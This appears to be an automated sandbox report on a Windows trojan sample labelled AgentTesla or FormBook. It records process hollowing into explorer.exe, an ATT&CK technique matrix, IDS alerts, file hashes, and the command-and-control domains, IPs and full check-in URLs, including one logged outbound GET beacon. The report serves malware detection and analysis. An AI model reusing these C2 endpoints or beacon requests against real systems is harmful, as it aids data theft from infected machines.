          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information


          Remote Access Functionality

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Shared Modules | Path Interception | 612 Process Injection | 1 Masquerading | OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 612 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 112 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 4 Obfuscated Files or Information | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 13 Software Packing | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Behavior Graph (ID: 562399, Sample: GV8EJooYMIgEnEk.exe, Startdate: 28/01/2022, Architecture: WINDOWS, Score: 100)
          • Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
          • GV8EJooYMIgEnEk.exe (started): dropped C:\Users\user\...\GV8EJooYMIgEnEk.exe.log (ASCII); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
          • GV8EJooYMIgEnEk.exe (started by the first instance): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected): System process connects to network (likely due to code injection or exploit); DNS/IP: www.experiencedlawfirms.com 166.88.62.202, 49816, 80 EGIHOSTINGUS United States; www.totalwinerewards.com 199.59.243.200, 49817, 80 BODIS-NJUS United States; 8 other IPs or domains
          • chkdsk.exe (started by explorer.exe): Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started by chkdsk.exe)
          • conhost.exe (started by cmd.exe)

          Source | Detection | Scanner | Label
          GV8EJooYMIgEnEk.exe | 61% | Virustotal |
          GV8EJooYMIgEnEk.exe | 21% | Metadefender |
          GV8EJooYMIgEnEk.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          GV8EJooYMIgEnEk.exe | 100% | Joe Sandbox ML |

          No Antivirus matches

          Source | Detection | Scanner | Label
          3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          No Antivirus matches

          Source | Detection | Scanner | Label
          http://www.omnipets.store/cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 | 0% | Avira URL Cloud | safe
          http://schemas.mi | 0% | URL Reputation | safe
          http://www.totalwinerewards.com/cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://schemas.micr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          www.cottoneworld.com/cbgo/ | 100% | Avira URL Cloud | malware
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          https://parking.bodiscdn.com | 0% | Avira URL Cloud | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf | 100% | Avira URL Cloud | malware
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 | 0% | Avira URL Cloud | safe

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.bitconga.com | 18.231.72.25 | true | true | | unknown
          webarate.com | 46.252.151.235 | true | true | | unknown
          omnipets.store | 34.102.136.180 | true | false | | unknown
          www.totalwinerewards.com | 199.59.243.200 | true | true | | unknown
          www.experiencedlawfirms.com | 166.88.62.202 | true | true | | unknown
          casatowerofficial.com | 34.102.136.180 | true | false | | unknown
          www.casatowerofficial.com | unknown | unknown | true | | unknown
          www.webarate.com | unknown | unknown | true | | unknown
          www.tothelaundry.com | unknown | unknown | true | | unknown
          www.omnipets.store | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://www.omnipets.store/cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 | false | Avira URL Cloud: safe | unknown
          http://www.totalwinerewards.com/cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 | true | Avira URL Cloud: safe | unknown
          www.cottoneworld.com/cbgo/ | true | Avira URL Cloud: malware | low
          http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf | false | Avira URL Cloud: malware | unknown
          http://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
46.252.151.235 | webarate.com | Italy | 60087 | ASSUPERNOVAIT | true
166.88.62.202 | www.experiencedlawfirms.com | United States | 18779 | EGIHOSTINGUS | true
18.231.72.25 | www.bitconga.com | United States | 16509 | AMAZON-02US | true
34.102.136.180 | omnipets.store | United States | 15169 | GOOGLEUS | false
199.59.243.200 | www.totalwinerewards.com | United States | 395082 | BODIS-NJUS | true
                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:562399
                                                    Start date:28.01.2022
                                                    Start time:20:57:13
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 37s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:GV8EJooYMIgEnEk.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:20
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@7/1@7/5
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 20.6% (good quality ratio 18.5%)
                                                    • Quality average: 70.5%
                                                    • Quality standard deviation: 32.3%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 82
                                                    • Number of non-executed functions: 131
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 184.87.213.153
                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
Time | Type | Description
--- | --- | ---
20:58:32 | API Interceptor | 1x Sleep call for process: GV8EJooYMIgEnEk.exe modified
                                                    Process:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.355304211458859
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.768784179337575
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:GV8EJooYMIgEnEk.exe
                                                    File size:391680
                                                    MD5:cf6d4fd3dc8e4751b7f89f857b618ef3
                                                    SHA1:15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
                                                    SHA256:9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
                                                    SHA512:86af327caf1d55c8d3dd1e2319dcae1faaf7db82fb2fdce83999b0a4e5c6af2ce700fb0c69f568169110f04b9af6543e069aee59101370d6af060d8d4763d43f
                                                    SSDEEP:6144:7qy0O+Q45IX8LhyTaFwZCpZpwhTvQJWpLcbK8lpmybOVbGmb0Xj/9JnQiypM7Jz8:7HgwZIjwxvwCLc9pHbOVLgXjLQiypM7
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._.a............................>.... ... ....@.. .......................`............@................................
                                                    Icon Hash:00828e8e8686b000
                                                    Entrypoint:0x460d3e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x61F25F83 [Thu Jan 27 09:01:55 2022 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x60cf0 | 0x4b | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x61c | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x64000 | 0xc | .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x60c96 | 0x1c | .text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                    .text | 0x2000 | 0x5ed44 | 0x5ee00 | False | 0.88598793643 | data | 7.78260076892 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc | 0x62000 | 0x61c | 0x800 | False | 0.32568359375 | data | 3.4603762807 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc | 0x64000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    Name | RVA | Size | Type | Language | Country
                                                    RT_VERSION | 0x620a0 | 0x38e | data | |
                                                    RT_MANIFEST | 0x62430 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
                                                    DLL | Import
                                                    mscoree.dll | _CorExeMain
                                                    Description | Data
                                                    Translation | 0x0000 0x04b0
                                                    LegalCopyright | Copyright Overwolf 2021
                                                    Assembly Version | 11.0.0.0
                                                    InternalName | StructuralEqualityCompar.exe
                                                    FileVersion | 11.0.0.0
                                                    CompanyName | Overwolf LTD
                                                    LegalTrademarks |
                                                    Comments |
                                                    ProductName | Overwolf
                                                    ProductVersion | 11.0.0.0
                                                    FileDescription | Overwolf
                                                    OriginalFilename | StructuralEqualityCompar.exe
                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                    01/28/22-20:59:48.188612 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49817 | 80 | 192.168.2.3 | 199.59.243.200
                                                    01/28/22-20:59:48.188612 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49817 | 80 | 192.168.2.3 | 199.59.243.200
                                                    01/28/22-20:59:48.188612 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49817 | 80 | 192.168.2.3 | 199.59.243.200
                                                    01/28/22-20:59:53.555000 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49819 | 34.102.136.180 | 192.168.2.3
                                                    01/28/22-20:59:59.099003 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49820 | 80 | 192.168.2.3 | 18.231.72.25
                                                    01/28/22-20:59:59.099003 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49820 | 80 | 192.168.2.3 | 18.231.72.25
                                                    01/28/22-20:59:59.099003 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49820 | 80 | 192.168.2.3 | 18.231.72.25
                                                    01/28/22-21:00:09.463600 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49821 | 80 | 192.168.2.3 | 34.102.136.180
                                                    01/28/22-21:00:09.463600 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49821 | 80 | 192.168.2.3 | 34.102.136.180
                                                    01/28/22-21:00:09.463600 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49821 | 80 | 192.168.2.3 | 34.102.136.180
                                                    01/28/22-21:00:09.578330 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49821 | 34.102.136.180 | 192.168.2.3
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                    Jan 28, 2022 20:59:42.674398899 CET | 192.168.2.3 | 8.8.8.8 | 0x48c8 | Standard query (0) | www.experiencedlawfirms.com | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 20:59:48.145526886 CET | 192.168.2.3 | 8.8.8.8 | 0xf74d | Standard query (0) | www.totalwinerewards.com | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 20:59:53.396126986 CET | 192.168.2.3 | 8.8.8.8 | 0x2129 | Standard query (0) | www.casatowerofficial.com | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 20:59:58.609788895 CET | 192.168.2.3 | 8.8.8.8 | 0x2e9b | Standard query (0) | www.bitconga.com | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 21:00:04.353455067 CET | 192.168.2.3 | 8.8.8.8 | 0x72a8 | Standard query (0) | www.tothelaundry.com | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 21:00:09.424981117 CET | 192.168.2.3 | 8.8.8.8 | 0x5eaf | Standard query (0) | www.omnipets.store | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 21:00:14.622612000 CET | 192.168.2.3 | 8.8.8.8 | 0xe911 | Standard query (0) | www.webarate.com | A (IP address) | IN (0x0001)
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                    Jan 28, 2022 20:59:42.790488005 CET | 8.8.8.8 | 192.168.2.3 | 0x48c8 | No error (0) | www.experiencedlawfirms.com | | 166.88.62.202 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 20:59:48.169529915 CET | 8.8.8.8 | 192.168.2.3 | 0xf74d | No error (0) | www.totalwinerewards.com | | 199.59.243.200 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 20:59:53.419476032 CET | 8.8.8.8 | 192.168.2.3 | 0x2129 | No error (0) | www.casatowerofficial.com | casatowerofficial.com | | CNAME (Canonical name) | IN (0x0001)
                                                    Jan 28, 2022 20:59:53.419476032 CET | 8.8.8.8 | 192.168.2.3 | 0x2129 | No error (0) | casatowerofficial.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 20:59:58.638331890 CET | 8.8.8.8 | 192.168.2.3 | 0x2e9b | No error (0) | www.bitconga.com | | 18.231.72.25 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 21:00:04.394292116 CET | 8.8.8.8 | 192.168.2.3 | 0x72a8 | Name error (3) | www.tothelaundry.com | none | none | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 21:00:09.445676088 CET | 8.8.8.8 | 192.168.2.3 | 0x5eaf | No error (0) | www.omnipets.store | omnipets.store | | CNAME (Canonical name) | IN (0x0001)
                                                    Jan 28, 2022 21:00:09.445676088 CET | 8.8.8.8 | 192.168.2.3 | 0x5eaf | No error (0) | omnipets.store | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                    Jan 28, 2022 21:00:14.657841921 CET | 8.8.8.8 | 192.168.2.3 | 0xe911 | No error (0) | www.webarate.com | webarate.com | | CNAME (Canonical name) | IN (0x0001)
                                                    Jan 28, 2022 21:00:14.657841921 CET | 8.8.8.8 | 192.168.2.3 | 0xe911 | No error (0) | webarate.com | | 46.252.151.235 | A (IP address) | IN (0x0001)
                                                    • www.experiencedlawfirms.com
                                                    • www.totalwinerewards.com
                                                    • www.casatowerofficial.com
                                                    • www.bitconga.com
                                                    • www.omnipets.store
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.2.3 | 49816 | 166.88.62.202 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 28, 2022 20:59:42.965996981 CET | 9880 | OUT | GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1
